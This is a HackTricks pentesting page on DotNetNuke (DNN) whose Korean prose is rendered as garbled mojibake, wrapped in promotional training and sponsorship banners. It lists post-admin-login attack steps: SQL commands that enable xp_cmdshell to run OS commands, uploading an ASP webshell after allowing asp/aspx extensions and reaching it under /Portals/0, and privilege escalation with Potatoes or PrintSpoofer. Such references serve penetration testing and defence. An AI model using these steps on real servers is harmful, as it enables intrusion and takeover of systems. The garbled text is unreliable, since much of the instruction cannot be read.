# DotNetNuke (DNN)
{% hint style="success" %}
Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: 
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## DotNetNuke (DNN)
DNNμ **κ΄λ¦¬μ**λ‘ λ‘κ·ΈμΈνλ©΄ RCEλ₯Ό μ»λ κ²μ΄ μ½μ΅λλ€.
## RCE
### SQLμ ν΅ν μ κ·Ό
**`Settings`** νμ΄μ§μμ SQL μ½μμ μ κ·Όν μ μμΌλ©°, μ¬κΈ°μ **`xp_cmdshell`**μ νμ±ννκ³ **μ΄μ 체μ λͺ
λ Ήμ μ€ν**ν μ μμ΅λλ€.
**`xp_cmdshell`**μ νμ±ννλ €λ©΄ λ€μ μ€μ μ¬μ©νμΈμ:
```sql
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
```
κ·Έλ¦¬κ³ **"Run Script"**λ₯Ό λλ¬ ν΄λΉ SQL λ¬Έμ μ€νν©λλ€.
κ·Έλ° λ€μ, λ€μκ³Ό κ°μ λ°©λ²μΌλ‘ OS λͺ
λ Ήμ μ€νν©λλ€:
```sql
xp_cmdshell 'whoami'
```
### Via ASP webshell
`Settings -> Security -> More -> More Security Settings`μμ `Allowable File Extensions` μλμ **μλ‘μ΄ νμ©λ νμ₯μ**λ₯Ό **μΆκ°**ν μ μμΌλ©°, κ·Έ ν `Save` λ²νΌμ ν΄λ¦ν©λλ€.
**`asp`** λλ **`aspx`**λ₯Ό μΆκ°ν ν **`/admin/file-management`**μμ μλ₯Ό λ€μ΄ **`shell.asp`**λΌλ **asp webshell**μ μ
λ‘λν©λλ€.
κ·Έλ° λ€μ **`/Portals/0/shell.asp`**μ μ κ·Όνμ¬ μΉμμ μ κ·Όν©λλ€.
### Privilege Escalation
μλ₯Ό λ€μ΄ **Potatoes** λλ **PrintSpoofer**λ₯Ό μ¬μ©νμ¬ **κΆν μμΉ**μ ν μ μμ΅λλ€.
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}